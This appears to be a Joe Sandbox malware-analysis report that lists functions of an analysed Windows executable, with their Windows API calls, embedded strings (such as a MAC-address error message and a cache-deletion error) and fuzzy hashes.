Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
Instruction ID: ca612bbd6e85d40e054d0ae89126da5a4b03999a9a8927983b9c67bc9c87c1df
Opcode Fuzzy Hash: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
Instruction Fuzzy Hash: 6D31A032800209BBCB01AFA5ED49DBF7B79EF49312F00042EF902B1162DB785914DB6A

Function 00460769 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004D90EC,76F90A60,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 0046077A
GlobalAlloc.KERNEL32(00000002,00000040,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 004607CB
GlobalHandle.KERNEL32(0069F6B0), ref: 004607D4
GlobalUnlock.KERNEL32(00000000), ref: 004607DE
GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 004607F2
GlobalHandle.KERNEL32(0069F6B0), ref: 00460804
GlobalLock.KERNEL32(00000000), ref: 0046080B
LeaveCriticalSection.KERNEL32(?,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60), ref: 00460814
GlobalLock.KERNEL32(00000000), ref: 00460820
LeaveCriticalSection.KERNEL32(?), ref: 00460868

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
Instruction ID: 24ed6f489e8cae63526faeb7cf58e8366cea2fd9f1ea75441c28e41bb40b13db
Opcode Fuzzy Hash: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
Instruction Fuzzy Hash: 94317A70A00B04AFC720DF69C848A5BBBF9FF84345B00496EE456D3620EBB4FA44CB55

Function 00455D4E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00455D53
GetSystemMetrics.USER32(0000002A), ref: 00455E17
GlobalLock.KERNEL32(00000000), ref: 00455E82
CreateDialogIndirectParamA.USER32(?,?,?,Function_000557E8,00000000), ref: 00455EB1

Strings

MS Shell Dlg, xrefs: 00455E21

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 2364537584-76309092
Opcode ID: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
Instruction ID: 60737eb939981e1663e8655a045ed5a825c3ec766cbfdbfa92d2e0a2365db7d1
Opcode Fuzzy Hash: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
Instruction Fuzzy Hash: 6F51C131900605DFCB10EFA4C89A9FEBBB5EF44316F14456BF802A7292D7794E48CB99

Function 0043C4F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0043C549
PtInRect.USER32(?,00000000,?), ref: 0043C556
SendMessageA.USER32(?,000002A3,?,?), ref: 0043C582
_TrackMouseEvent.COMCTL32 ref: 0043C5B2
GetClientRect.USER32(?,?), ref: 0043C653
PtInRect.USER32(?,00000000,?), ref: 0043C660
CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C6F0

Strings

(sM, xrefs: 0043C5F4

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Rect$Client$CallEventMessageMouseProcSendTrackWindow
String ID: (sM
API String ID: 3515703253-3311458642
Opcode ID: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
Instruction ID: 8c3f4903dc8baf6d121fe7fb3753f05e18b3a4cd0aa498f358327e813194e9bc
Opcode Fuzzy Hash: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
Instruction Fuzzy Hash: 6451C372604210ABC710DB19CCC8E6BB7E9EBC9310F04592FF94697291E739ED05CB6A

Function 0042D080 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042D0B4
GetLogicalDrives.KERNEL32 ref: 0042D0B6
SendMessageA.USER32(?,00000143,00000000,?), ref: 0042D129
SendMessageA.USER32(?,00000151,?,-00000041), ref: 0042D13D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042D188
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0042D19A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0042D1AB

Strings

%c:\, xrefs: 0042D100

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend$DrivesLogical
String ID: %c:\
API String ID: 501861121-3142399695
Opcode ID: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
Instruction ID: 9dc9e9830e61ed712b0ca2553cde3fd99fe03222a10af47223d38b0de3f2946a
Opcode Fuzzy Hash: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
Instruction Fuzzy Hash: FB31CF71700711ABD600CF28CC81F5BF7A8FB88720F108A19F5599B2D1CBB8E8058BE5

Function 00460F91 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3

Strings

.CHM, xrefs: 00461077
.INI, xrefs: 004610A7
.HLP, xrefs: 0046107E

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
String ID: .CHM$.HLP$.INI
API String ID: 2140653559-4017452060
Opcode ID: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
Instruction ID: b47048ef5958d033ffe7bf5904ed0b4a0b0cffc92f540df513db9c3eee53b71e
Opcode Fuzzy Hash: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
Instruction Fuzzy Hash: 04413B719007489FDF70DF66D884ADB77E8AB08344F14482BE946C6651FB78D984CB26

Function 0045BE9D Relevance: 12.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000000B), ref: 0045BEAA
GetSystemMetrics.USER32(0000000C), ref: 0045BEB1
GetSystemMetrics.USER32(00000002), ref: 0045BEB8
GetSystemMetrics.USER32(00000003), ref: 0045BEC2
GetDC.USER32(00000000), ref: 0045BECC
GetDeviceCaps.GDI32(00000000,00000058), ref: 0045BEDD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045BEE5
ReleaseDC.USER32(00000000,00000000), ref: 0045BEED

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
Instruction ID: b07b7a82b072b39a71f8a96b90e28bccc6b23350fc1b81c5107f06a5aa9eb94c
Opcode Fuzzy Hash: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
Instruction Fuzzy Hash: 36F03071A40B04AEE7206F71AC4DF2B7BA4EB85B61F01452AE6428B2D0DBB59C018F54

Function 0042F9A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042FA06
SendMessageA.USER32(?,00000143,00000000,?), ref: 0042FA99
SendMessageA.USER32(?,00000151,00000000,?), ref: 0042FAB1
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042FAC9

Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E

Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF

Strings

Have no usable adapters, MAC Address can't Modify!, xrefs: 0042FAEE
Error, xrefs: 0042FAE9

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Message$Send$CallbackDispatcherItemUser
String ID: Error$Have no usable adapters, MAC Address can't Modify!
API String ID: 670485088-1610973038
Opcode ID: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
Instruction ID: 26f2146aec7202859a8a0788ea455b2750414a0d6ce9a465af84665d90ab2efc
Opcode Fuzzy Hash: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
Instruction Fuzzy Hash: 43410DB1344700EBD721DB25CC82F9BB7E9ABD4704F40092EF59A973C2DA78A909C759

Function 004029A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A03
FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A1B
GetLastError.KERNEL32 ref: 00402A29
DeleteUrlCacheEntry.WININET(?), ref: 00402A96
FindCloseUrlCache.WININET(00000000), ref: 00402B14

Strings

There is an error (%d) when trying deleting temporary internet files., xrefs: 00402ACA

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Cache$EntryFind$CloseDeleteErrorFirstLastNext
String ID: There is an error (%d) when trying deleting temporary internet files.
API String ID: 2077925056-841692006
Opcode ID: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
Instruction ID: 94eec7699a4fa6117de3be0bb099d12cbcff65c4a93994e37f97ae03476e8131
Opcode Fuzzy Hash: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
Instruction Fuzzy Hash: 9341B8712047019FC310DF55C948A1BB7E9BB85325F144B3EF456A32D1EBB8D805CB5A

Function 0045723F Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0045726D
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457294
UpdateWindow.USER32(?), ref: 004572AE
SendMessageA.USER32(?,00000121,00000000,?), ref: 004572D2
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004572EC
UpdateWindow.USER32(?), ref: 00457332
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457366

Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
Instruction ID: 32369ea9d48cbdeecc609184201b7489618483d9b436833af93530d3bdef152a
Opcode Fuzzy Hash: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
Instruction Fuzzy Hash: 2941C130108741ABD7319F26AC45A1FBAF4EBC1716F100A7EFC81416A2DB69C84DC65A

Function 0043C700 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0043C733
PtInRect.USER32(?,?,?), ref: 0043C740
SendMessageA.USER32(?,000002A3,?,?), ref: 0043C757
_TrackMouseEvent.COMCTL32 ref: 0043C787
CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C803

Strings

(sM, xrefs: 0043C7D6

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Rect$CallClientEventMessageMouseProcSendTrackWindow
String ID: (sM
API String ID: 1649741670-3311458642
Opcode ID: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
Instruction ID: 898cb067ecc559f41ab13f6a3b788ad7c7261948081919be5936e31082410bb8
Opcode Fuzzy Hash: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
Instruction Fuzzy Hash: 5921D071209301AFD310DF54DC88E6B77A9EB8D324F40192EF95697281E778D9098BAB

Function 004610DF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000,00000000,0045C864,?,?,?,?,76F90A60,00000000,?,00448293,00000000), ref: 004610E8
SetErrorMode.KERNEL32(00000000,?,00448293,00000000), ref: 004610F0
GetModuleHandleA.KERNEL32(user32.dll,00448293,00000000), ref: 0046113B
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0046114B

Part of subcall function 00460F91: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
Part of subcall function 00460F91: PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
Part of subcall function 00460F91: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
Part of subcall function 00460F91: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3

Strings

NotifyWinEvent, xrefs: 00461145
user32.dll, xrefs: 00461136

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
String ID: NotifyWinEvent$user32.dll
API String ID: 4004864024-597752486
Opcode ID: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
Instruction ID: 615a388b9bcc3293a458a96628157c91bad4f8643237e7b27ee424f6813bd525
Opcode Fuzzy Hash: dcbdc58545cd4e1162221064df486b16a652db97318d6272985f662fc1f80566
Instruction Fuzzy Hash: EB014F74A002508FC720AF259844A9A3BE8AF49758F05445FF5849B362EB79C800CB5B

Function 00438E30 Relevance: 9.1, APIs: 6, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF

SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E58
SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E73
SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E8E
SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EA9
SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EC4
SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EDF

Part of subcall function 00436B70: RegOpenKeyExA.KERNEL32 ref: 00436BD0

Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend$H_prologItemOpen
String ID:
API String ID: 2983078765-0
Opcode ID: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
Instruction ID: f8e102232e88c27b8a68ebd60c734d88dc141a5e6a7d4b07252fac42151194af
Opcode Fuzzy Hash: bee28f99374385575d7cab4925c685f48e7f35793e92d94da914d8f9674fc980
Instruction Fuzzy Hash: 7B112A713E1751B7F82A7B268C53F2E211B9BC4F14F01411AF7012F2D3CAE9E9828689

Function 004056E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00405710
IUnknown_Release_Proxy.RPCRT4(?), ref: 0040572B
GetWindowsDirectoryA.KERNEL32(00000001,00000104), ref: 00405739
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000022,00000000), ref: 00405780

Strings

\History, xrefs: 0040574C

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

